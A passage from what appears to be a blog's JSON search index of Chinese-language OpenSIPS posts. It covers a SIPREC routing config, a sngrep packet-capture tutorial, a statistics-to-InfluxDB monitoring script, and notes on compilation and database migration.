\u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, 
\u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; modparam(\u0026#34;registrar\u0026#34;, \u0026#34;tcp_persistent_flag\u0026#34;, \u0026#34;TCP_PERSISTENT\u0026#34;) /* uncomment the next line not to allow more than 10 contacts per AOR */ #modparam(\u0026#34;registrar\u0026#34;, \u0026#34;max_contacts\u0026#34;, 10) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. if you enable this parameter, be sure the enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) loadmodule \u0026#34;proto_udp.so\u0026#34; loadmodule \u0026#34;dialog.so\u0026#34; loadmodule \u0026#34;b2b_entities.so\u0026#34; loadmodule \u0026#34;siprec.so\u0026#34; loadmodule \u0026#34;rtpproxy.so\u0026#34; modparam(\u0026#34;rtpproxy\u0026#34;, \u0026#34;rtpproxy_sock\u0026#34;, \u0026#34;udp:127.0.0.1:7899\u0026#34;) ####### Routing Logic ######## # main request routing logic route{ if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # handle hop-by-hop ACK (no routing required) if ( is_method(\u0026#34;ACK\u0026#34;) \u0026amp;\u0026amp; t_check_trans() ) { t_relay(); exit; } # sequential request within a dialog should # take the path determined by record-routing if ( !loose_route() ) { # we do record-routing for all our traffic, so we should not # receive any sequential requests without Route hdr. 
sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); exit; } if (is_method(\u0026#34;BYE\u0026#34;)) { # do accounting even if the transaction fails do_accounting(\u0026#34;log\u0026#34;,\u0026#34;failed\u0026#34;); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). route(relay); exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } t_check_trans(); if ( !(is_method(\u0026#34;REGISTER\u0026#34;) ) ) { if (is_myself(\u0026#34;$fd\u0026#34;)) { } else { # if caller is not local, then called number must be local if (!is_myself(\u0026#34;$rd\u0026#34;)) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Rely forbidden\u0026#34;); exit; } } } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) sl_send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # account only INVITEs if (is_method(\u0026#34;INVITE\u0026#34;)) { create_dialog(); rtpproxy_engage(); siprec_start_recording(\u0026#34;sip:127.0.0.1:5090\u0026#34;); do_accounting(\u0026#34;log\u0026#34;); } if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { sl_send_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); exit; } if (is_method(\u0026#34;REGISTER\u0026#34;)) { if (!save(\u0026#34;location\u0026#34;)) sl_reply_error(); exit; } if ($rU==NULL) { # request with no Username in RURI sl_send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } # do lookup with method filtering if (!lookup(\u0026#34;location\u0026#34;,\u0026#34;m\u0026#34;)) { 
t_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; } # when routing via usrloc, log the missed calls also do_accounting(\u0026#34;log\u0026#34;,\u0026#34;missed\u0026#34;); route(relay); } route[relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_reply(\u0026#34;handle_nat\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); }; exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } ","permalink":"https://wdd.js.org/opensips/ch8/siprec/","summary":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. 
# ####### Global Parameters ######### log_level=3 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:127.","title":"siprec"},{"content":"1. 安装 1.1. centos vim /etc/yum.repos.d/irontec.repo\n[irontec] name=Irontec RPMs repository baseurl=http://packages.irontec.com/centos/$releasever/$basearch/ rpm --import http://packages.irontec.com/public.key\nyum install sngrep\n1.2 debian/ubuntu # debian 安装sngrep echo \u0026#34;deb http://packages.irontec.com/debian jessie main\u0026#34; \u0026gt;\u0026gt; /etc/apt/sources.list wget http://packages.irontec.com/public.key -q -O - | apt-key add - apt-get install sngrep -y debian buster 即 debian10以上可以直接 apt-get install sngrep 1.3 arch/manjaro yay -Syu sngrep 参考: https://aur.archlinux.org/packages/sngrep/\n如果报错,编辑 /etc/makepkg.conf文件,删除其中的-Werror=format-security\nCFLAGS=\u0026#34;-march=x86-64 -mtune=generic -O2 -pipe -fno-plt -fexceptions \\ -Wp,-D_FORTIFY_SOURCE=2 -Wformat -Werror=format-security \\ -fstack-clash-protection -fcf-protection\u0026#34; 2. 
命令行参数 sngrep [-hVcivNqrD] [-IO pcap_dump] [-d dev] [-l limit] [-k keyfile] [-LH capture_url] [\u0026lt;match expression\u0026gt;] [\u0026lt;bpf filter\u0026gt;] -h --help: 显示帮助信息 -V --version: 显示版本信息 -d --device: 指定抓包的网卡 -I --input: 从pcap文件中解析sip包 -O --output: 输出捕获的包到pcap文件中 -c --calls: 仅显示invite消息 -r --rtp: Capture RTP packets payload 捕获rtp包 -l --limit: 限制捕获对话的数量 -i --icase: 使大小写不敏感 -v --invert: 反转匹配表达式,只显示不匹配的对话 -N --no-interface: Don\u0026rsquo;t display sngrep interface, just capture -q --quiet: Don\u0026rsquo;t print captured dialogs in no interface mode -D --dump-config: Print active configuration settings and exit -f --config: Read configuration from file -R --rotate: Rotate calls when capture limit have been reached. -H --eep-send: Homer sipcapture url (udp:X.X.X.X:XXXX) -L --eep-listen: Listen for encapsulated packets (udp:X.X.X.X:XXXX) -k --keyfile: RSA private keyfile to decrypt captured packets 3. 页面 sngrep有四个页面,每个页面都有一些不同的快捷键。\n呼叫列表页面 呼叫流程页面 原始呼叫信息页面 信息对比页面 3.1 呼叫列表页面 快捷键\nArrow keys: Move through the list,除了上下箭头还可以使用j,k来移动光标 Enter: Display current or selected dialog(s) message flow A: Auto scroll to new calls,自动滚动到新的call F2 or s: Save selected/all dialog(s) to a PCAP file, 保存dialog到pcap文件 F3 or / or TAB: Enter a display filter. This filter will be applied to the text lines in the list,进入搜索 F4 or x: Display current selected dialog and its related one. 
回到第一个sip消息上 F5: Clear call list, 清空呼叫列表 F6 or r: Display selected dialog(s) messages in raw text, 显示原始的sip消息 F7 or f: Show advanced filters dialogs 显示高级过滤弹窗 F9 or l: Turn on/off address resolution if enabled F10 or t: Select displayed columns, 显示或者隐藏侧边sip消息栏 呼叫列表页面还能够显示两个弹窗, 按f可以显示高级过滤配置\n按t可以显示, 自定义呼叫列选项弹窗\n3.2 呼叫流程页面 快捷键\n**Keybindings:\nArrow keys: Move through messages Enter: Display current message raw (so you can copy payload) F2 or d: 显示sdp消息,f2的某个模式会让时序图更紧凑 F3 or t: 显示或者关闭sip侧边栏 F4 or x: 回到顶部 F5 or s: 每个ip地址仅仅显示一列 F6 or R: 显示原始的sip消息 F7 or c: 改变颜色模式, 有的颜色模式很容易让人无法区分当前查看的sip消息是哪一个,所以需要改变颜色模式 F9 or l: Turn on/off address resolution if enabled 9 and 0: 增加或者减少侧边栏的宽度 T: 重绘侧边栏 D: 仅显示带有sdp的消息 空格键:选中一个sip消息,再次找个sip消息,然后就会进入对比模式 F1 or h: 显示帮助信息页面 3.3 原始sip消息界面 3.4 消息对比界面 在呼叫列表页面按空格键选中一个消息,然后选择另外一个sip消息后,再次按空格键,就可以进入消息对比页面\n4. 分析媒体问题 使用 sngrep -r 可以用来捕获媒体流,默认不加 -r 则只能显示信令。\n在呼叫流程页面,按下F3, 可以动态的查看媒体流的情况。在分析语音问题时,这是非常方便的分析工具。 5. 扩展技法 5.1 无界面模式 假如说有个很大的语音文件,假如说有1.5G吧,如果用wireshark直接打开,有可能wireshark直接卡死,也有可能在搜索的时候就崩溃了。\n即使有sngrep来直接读取pcap文件,也可能会非常慢。\n假如说我们只想从这1.5G文件中找到本叫号码包含1234的,应该怎么处理呢?\n用下面的命令就可以:\nsngrep -rI test.pcap 1234 -N -O dst.pcap Dialog count: 17 -r 读取语音流 -I 从pcap文件中读取 -N 不要界面 -O 将匹配的结果写到其他文件中 经过上面的命令,一个很大的pcap文件,在处理之后,就会变成我们关心的小的包文件。比较容易处理了。\n5.2 个性化配置 在呼叫列表界面,按F8可以进入到个性化配置界面,如下:\n个性化配置页面有三个Tab页面, 三个页面可以用翻页的pageUp, pageDown来切换。在macbook上可能没有翻页键,那你要用fn + 上下方向键 来翻页\nInterface Capture Call Flow 在每个页面可以用上下键来选择不同的设置项,按左右键改变对应的值。也可以按空格键来改变对应的值。\n在每个Tab页面,可以按Tab键在设置项和下面的Accept和Save、Cancel之间切换。\n我们的个性化配置可以用Save来保存下来,不然每次都要再设置一遍。\n1. interface 页面 2. Capture设置界面 配置抓包相关的信息,例如最大抓包的数量,网卡设备,是否启用事务,默认的保存文件路径等等。 3. Call Flow页面 这个页面用来设置呼叫时序图页面。就不再过多介绍。\n我用的比较多的,可能是Merge columns with same address。 sngrep默认用IP:PORT作为时序图中的一个竖线。但是如果IP相同,端口号不同。sngrep就会划出很多竖线。启用了该项之后,就只会根据IP来划竖线。 区分IP和端口: Merge columns with same address on 表示只根据IP来划竖线 off 表示根据IP:PORT来划线,如果你想在竖线上能看到端口信息,则需要设置为off 如下图所示,Merge columns with same address: off 如何更容易区分当前是在哪一个信令上? 
有时候移动的快一点,例如只能看到SIP消息是REGISTER, 但是具体是哪一个REGISTER, 看得眼疼也区分不出来。 这时候Call Flow中的Selected message highlight就派上用场。\nbold 加粗 reverse 反色 reversebold 反色并且加粗 一般情况下,reverse或者reversebold都能让你更好的区分,下面就是使用reverse模式下的时序图\n可以很明显的看到,第三个REGISTER的背景色变了一大块,所以当前就是在第三个REGISTER信令上。 6. sngrep使用注意点 不要长时间用sngrep抓包,否则sngrep会占用非常多的内存。如果必须抓一段时间的包,务必使用tcpdump。 某些情况下,sngrep会丢包 某些情况下,sngrep会什么包都抓不到,注意此时很可能要使用-d去指定抓包的网卡 sngrep只能捕获本机网卡收到和发送的流量。假如ABC分别是三台独立虚拟机的SIP服务器,在B上抓包只能分析A-B和B-C之间的流量。 再次强调:sngrep不适合长时间抓包,只适合短时间抓包分析问题。如果你需要记录所有的sip消息,并展示,可以考虑使用siphub,或者homer。 ","permalink":"https://wdd.js.org/opensips/tools/sngrep/","summary":"1. 安装 1.1. centos vim /etc/yum.repos.d/irontec.repo\n[irontec] name=Irontec RPMs repository baseurl=http://packages.irontec.com/centos/$releasever/$basearch/ rpm --import http://packages.irontec.com/public.key\nyum install sngrep\n1.2 debian/ubuntu # debian 安装sngrep echo \u0026#34;deb http://packages.irontec.com/debian jessie main\u0026#34; \u0026gt;\u0026gt; /etc/apt/sources.list wget http://packages.irontec.com/public.key -q -O - | apt-key add - apt-get install sngrep -y debian buster 即 debian10以上可以直接 apt-get install sngrep 1.3 arch/manjaro yay -Syu sngrep 参考: https://aur.archlinux.org/packages/sngrep/\n如果报错,编辑 /etc/makepkg.conf文件,删除其中的-Werror=format-security\nCFLAGS=\u0026#34;-march=x86-64 -mtune=generic -O2 -pipe -fno-plt -fexceptions \\ -Wp,-D_FORTIFY_SOURCE=2 -Wformat -Werror=format-security \\ -fstack-clash-protection -fcf-protection\u0026#34; 2.","title":"sngrep: 最好用的sip可视化抓包工具"},{"content":"**opensipsctl fifo get_statistics all **命令可以获取所有统计数据,在所有统计数据中,我们只关心内存,事务和会话的数量。然后将数据使用curl工具写入到influxdb中。\nopensipsctl fifo reset_statistics all 重置统计数据\n常用指令 命令 描述 opensipsctl fifo which 显示所有可用命令 opensipsctl fifo ps 显示所有进程 opensipsctl fifo get_statistics all 获取所有统计信息 opensipsctl fifo get_statistics core: 获取内核统计信息 opensipsctl fifo get_statistics net: 获取网络统计信息 opensipsctl fifo get_statistics pkmem: 获取私有内存相关信息 opensipsctl fifo get_statistics tm: 获取事务模块统计信息 opensipsctl 
fifo get_statistics sl: 获取sl模块统计信息 opensipsctl fifo get_statistics shmem: 获取共享内存相关信息 opensipsctl fifo get_statistics usrloc: 获取usrloc模块统计信息 opensipsctl fifo get_statistics registrar: 获取注册统计信息 opensipsctl fifo get_statistics uri: 获取uri统计信息 opensipsctl fifo get_statistics load: 获取负载信息 opensipsctl fifo reset_statistics all 重置所有统计信息 shmem:total_size:: 6467616768 shmem:used_size:: 4578374040 shmem:real_used_size:: 4728909408 shmem:max_used_size:: 4728909408 shmem:free_size:: 1738707360 shmem:fragments:: 1 # 事务 tm:UAS_transactions:: 296337 tm:UAC_transactions:: 30 tm:2xx_transactions:: 174737 tm:3xx_transactions:: 0 tm:4xx_transactions:: 110571 tm:5xx_transactions:: 2170 tm:6xx_transactions:: 0 tm:inuse_transactions:: 289651 dialog:active_dialogs:: 156 dialog:early_dialogs:: 680 dialog:processed_dialogs:: 104061 dialog:expired_dialogs:: 964 dialog:failed_dialogs:: 78457 dialog:create_sent:: 0 dialog:update_sent:: 0 dialog:delete_sent:: 0 dialog:create_recv:: 0 dialog:update_recv:: 0 dialog:delete_recv:: 0 CONF_DB_URL=\u0026#34;ip:port\u0026#34; # influxdb地址 CONF_DB_NAME=\u0026#34;dbname\u0026#34; # influxdb数据库名 CONF_OPENSIPS_ROLE=\u0026#34;a\u0026#34; # 角色,随便写个字符串 PATH=\u0026#34;/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/root/bin\u0026#34; LOCAL_IP=`ip route get 8.8.8.8 | head -n +1 | tr -s \u0026#34; \u0026#34; | cut -d \u0026#34; \u0026#34; -f 7` MSG=`opensipsctl fifo get_statistics all | grep -E \u0026#34;tm:|shmem:|dialog\u0026#34; | awk -F \u0026#39;:: \u0026#39; \u0026#39;BEGIN{OFS=\u0026#34;=\u0026#34;;ORS=\u0026#34;,\u0026#34;} {print $1,$2}\u0026#39; | sed \u0026#39;s/[-:.]/_/g\u0026#39;` MSG=${MSG:0:${#MSG}-1} echo $MSG influxdb=\u0026#34;http://$CONF_DB_URL/write?db=$CONF_DB_NAME\u0026#34; curl -i -XPOST $influxdb --data-binary \u0026#34;opensips,type=$CONF_OPENSIPS_ROLE,ip=$LOCAL_IP $MSG\u0026#34; shmem:total_size:: 33554432\nshmem:used_size:: 2910624\nshmem:real_used_size:: 3722856\nshmem:max_used_size:: 21963544\nshmem:free_size:: 29831576\nshmem:fragments:: 
30761\ncore:rcv_requests:: 1625972\ncore:rcv_replies:: 580098\ncore:fwd_requests:: 26146\ncore:fwd_replies:: 0\ncore:drop_requests:: 27\ncore:drop_replies:: 0\ncore:err_requests:: 0\ncore:err_replies:: 0\ncore:bad_URIs_rcvd:: 0\ncore:unsupported_methods:: 0\ncore:bad_msg_hdr:: 0\ncore:timestamp:: 179429\nnet:waiting_udp:: 0\nnet:waiting_tcp:: 0\nsl:1xx_replies:: 0\nsl:2xx_replies:: 930643\nsl:3xx_replies:: 0\nsl:4xx_replies:: 265459\nsl:5xx_replies:: 168472\nsl:6xx_replies:: 0\nsl:sent_replies:: 1364574\nsl:sent_err_replies:: 0\nsl:received_ACKs:: 27\ntm:received_replies:: 570374\ntm:relayed_replies:: 402332\ntm:local_replies:: 155868\ntm:UAS_transactions:: 181106\ntm:UAC_transactions:: 71770\ntm:2xx_transactions:: 117167\ntm:3xx_transactions:: 0\ntm:4xx_transactions:: 138052\ntm:5xx_transactions:: 29\ntm:6xx_transactions:: 0\ntm:inuse_transactions:: 2\nuri:positive checks:: 195024\nuri:negative_checks:: 0\nusrloc:registered_users:: 0\nusrloc:location-users:: 0\nusrloc:location-contacts:: 0\nusrloc:location-expires:: 0\nregistrar:max_expires:: 180\nregistrar:max_contacts:: 1\nregistrar:default_expire:: 150\nregistrar:accepted_regs:: 110781\nregistrar:rejected_regs:: 84236\ndialog:active_dialogs:: 0\ndialog:early_dialogs:: 0\ndialog:processed_dialogs:: 150397\ndialog:expired_dialogs:: 0\ndialog:failed_dialogs:: 137297\ndialog:create_sent:: 0\ndialog:update_sent:: 0\ndialog:delete_sent:: 0\ndialog:create_recv:: 0\ndialog:update_recv:: 0\ndialog:delete_recv:: 0\n","permalink":"https://wdd.js.org/opensips/ch3/opensips-monitor/","summary":"**opensipsctl fifo get_statistics all **命令可以获取所有统计数据,在所有统计数据中,我们只关心内存,事务和会话的数量。\nopensipsctl fifo reset_statistics all 重置统计数据\n常用指令 命令 描述 opensipsctl fifo which 显示所有可用命令 opensipsctl fifo ps 显示所有进程 opensipsctl fifo get_statistics all 获取所有统计信息 opensipsctl fifo get_statistics core: 获取内核统计信息 opensipsctl fifo get_statistics net: 获取网络统计信息 opensipsctl fifo get_statistics pkmem: 获取私有内存相关信息 opensipsctl fifo get_statistics tm: 获取事务模块统计信息 opensipsctl fifo get_statistics sl: 获取sl模块统计信息 opensipsctl fifo get_statistics shmem: 
获取共享内存相关信息 opensipsctl fifo get_statistics usrloc: 获取usrloc模块统计信息 opensipsctl fifo get_statistics registrar: 获取注册统计信息 opensipsctl fifo get_statistics uri: 获取uri统计信息 opensipsctl fifo get_statistics load: 获取负载信息 opensipsctl fifo reset_statistics all 重置所有统计信息 shmem:total_size:: 6467616768 shmem:used_size:: 4578374040 shmem:real_used_size:: 4728909408 shmem:max_used_size:: 4728909408 shmem:free_size:: 1738707360 shmem:fragments:: 1 # 事务 tm:UAS_transactions:: 296337 tm:UAC_transactions:: 30 tm:2xx_transactions:: 174737 tm:3xx_transactions:: 0 tm:4xx_transactions:: 110571 tm:5xx_transactions:: 2170 tm:6xx_transactions:: 0 tm:inuse_transactions:: 289651 dialog:active_dialogs:: 156 dialog:early_dialogs:: 680 dialog:processed_dialogs:: 104061 dialog:expired_dialogs:: 964 dialog:failed_dialogs:: 78457 dialog:create_sent:: 0 dialog:update_sent:: 0 dialog:delete_sent:: 0 dialog:create_recv:: 0 dialog:update_recv:: 0 dialog:delete_recv:: 0 CONF_DB_URL=\u0026#34;ip:port\u0026#34; # influxdb地址 CONF_DB_NAME=\u0026#34;dbname\u0026#34; # influxdb数据库名 CONF_OPENSIPS_ROLE=\u0026#34;a\u0026#34; # 角色,随便写个字符串 PATH=\u0026#34;/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/root/bin\u0026#34; LOCAL_IP=`ip route get 8.
include_modules=\u0026#34;db_mysql httpd\u0026#34; make install include_modules=\u0026#34;db_mysql httpd\u0026#34; 可能遇到的报错以及解决方案 主要的问题可能是某些包冲突,或者某些库没有安装依赖。在解决问题后,需要重新编译。\n1. linux2.6.x86_64 conflicts with file from package .linux2.6.x86_64 conflicts with file from package MySQL-server-5.1.7-0.i386 file /usr/share/mysql/italian/errmsg.sys from install of MySQL-server-5.5.28-1.linux2.6.x86_64 conflicts with file from package MySQL-server-5.1.7-0.i386 file /usr/share/mysql/japanese/errmsg.sys from install of MySQL-server-5.5.28-\n解决方案:rpm -qa | grep mysql | xargs rpm -e --nodeps\n2. my_con.h:29:19: fatal error: mysql.h: No such file or directory my_con.h:29:19: fatal error: mysql.h: No such file or directory\n解决方案:yum install mysql-devel -y\n3. siprec_uuid.h:29:23: fatal error: uuid/uuid.h: No such file or directory ERROR3:\nsiprec_uuid.h:29:23: fatal error: uuid/uuid.h: No such file or directory #include \u0026lt;uuid/uuid.h\u0026gt;\n解决方案:yum install libuuid-devel -y\n4. regex.so: undefined symbol: debug 数据库迁移 opensips不同的版本,所需要的模块对应的表可能都不同,所以需要迁移数据库。\n迁移数据库需要opensipsdbctl命令,这个命令会根据opensipsctlrc文件连接opensips所使用的数据库。\nopensips的升级有个特点:新版本的opensipsdbctl只能用来升级之前版本的opensips。\n从官方文档可以看出 2.2版本的opensips要升级到2.4,中间需要经过2.3。也就是说,你需要用opensips 2.3中的opensipsdbctl将 2.2升级到2.3,然后使用opensips 2.4中的opensipsdbctl将 2.3升级到2.4。\n为了加快升级速度,避免再安装不必要的版本,我构建了两个docker镜像,这两个镜像分别是2.3版本的opensips和2.4版本的opensips。我们可以使用这两个镜像中的opensipsdbctl来升级数据库。\ndocker pull ccr.ccs.tencentyun.com/wangdd/opensips-base:2.3.1 docker pull ccr.ccs.tencentyun.com/wangdd/opensips-base:2.4.2 先从2.2升级到2.3\ndocker run -it --name opensips --rm ccr.ccs.tencentyun.com/wangdd/opensips-base:2.3.1 bash vim /usr/local/etc/opensipsctlrc opensipsdbctl migrate opensips_old_db opensips_new_db # 下面会让你输入数据库密码, # 下面可能让你输入y/n, 一律输入y # 如果让你选择字符集,则输入 latin1 然后基于老的数据库,创建新的数据库。对于老的数据库,opensipsdbctl并不会改变它的任何字段。\n首先需要配置/usr/local/etc/opensips/opensipsctlrc文件,把mysql相关的配置修改正确。\n有可能升级过后opensips -V 输出的还是老版本的opensips, 这时需要\n排查PATH /usr/local/sbin/ 
是不是在 /usr/sbin的前面 重新连接shell, 有可能环境变量还未更新 可执行文件的位置 # 2.x版本的 /usr/local/sbin/ # 1.x 版本的 /usr/sbin 报错 Jul 18 19:37:22 [28181] ERROR:core:sr_load_module: could not open module \u0026lt;/usr/local/lib64/opensips/modules/regex.so\u0026gt;: /usr/local/lib64/opensips/modules/regex.so: undefined symbol: debug Jul 18 19:37:22 [28181] ERROR:core:load_module: failed to load module Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 26, column 13-14: failed to load module regex.so Jul 18 19:37:22 [28181] ERROR:core:sr_load_module: could not open module \u0026lt;/usr/local/lib64/opensips/modules/rest_client.so\u0026gt;: /usr/local/lib64/opensips/modules/rest_client.so: undefined symbol: debug Jul 18 19:37:22 [28181] ERROR:core:load_module: failed to load module Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 57, column 13-14: failed to load module rest_client.so Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: parameter \u0026lt;failed_transaction_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 99, column 20-21: Parameter \u0026lt;failed_transaction_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: parameter \u0026lt;db_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 101, column 20-21: Parameter \u0026lt;db_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: parameter \u0026lt;db_missed_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file 
/usr/local//etc/opensips/opensips.cfg, line 102, column 20-21: Parameter \u0026lt;db_missed_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: parameter \u0026lt;cdr_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 103, column 20-21: Parameter \u0026lt;cdr_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: parameter \u0026lt;db_extra\u0026gt; not found in module \u0026lt;acc\u0026gt; Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 104, column 20-21: Parameter \u0026lt;db_extra\u0026gt; not found in module \u0026lt;acc\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:sr_load_module: could not open module \u0026lt;/usr/local/lib64/opensips/modules/carrierroute.so\u0026gt;: /usr/local/lib64/opensips/modules/carrierroute.so: undefined symbol: debug Jul 18 19:37:22 [28181] ERROR:core:load_module: failed to load module Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 146, column 13-14: failed to load module carrierroute.so Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: no module matching carrierroute found Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 147, column 20-21: Parameter \u0026lt;db_url\u0026gt; not found in module \u0026lt;carrierroute\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: no module matching carrierroute found Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 148, column 20-21: Parameter \u0026lt;config_source\u0026gt; not found in 
module \u0026lt;carrierroute\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: no module matching carrierroute found Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 149, column 19-20: Parameter \u0026lt;use_domain\u0026gt; not found in module \u0026lt;carrierroute\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: no module matching carrierroute found Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 150, column 20-21: Parameter \u0026lt;db_failure_table\u0026gt; not found in module \u0026lt;carrierroute\u0026gt; - can\u0026#39;t set Jul 18 19:37:23 [28181] ERROR:core:sr_load_module: could not open module \u0026lt;/usr/local/lib64/opensips/modules/dialplan.so\u0026gt;: /usr/local/lib64/opensips/modules/dialplan.so: undefined symbol: debug Jul 18 19:37:23 [28181] ERROR:core:load_module: failed to load module Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 161, column 13-14: failed to load module dialplan.so Jul 18 19:37:23 [28181] ERROR:core:set_mod_param_regex: no module matching dialplan found Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 162, column 20-21: Parameter \u0026lt;db_url\u0026gt; not found in module \u0026lt;dialplan\u0026gt; - can\u0026#39;t set Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse 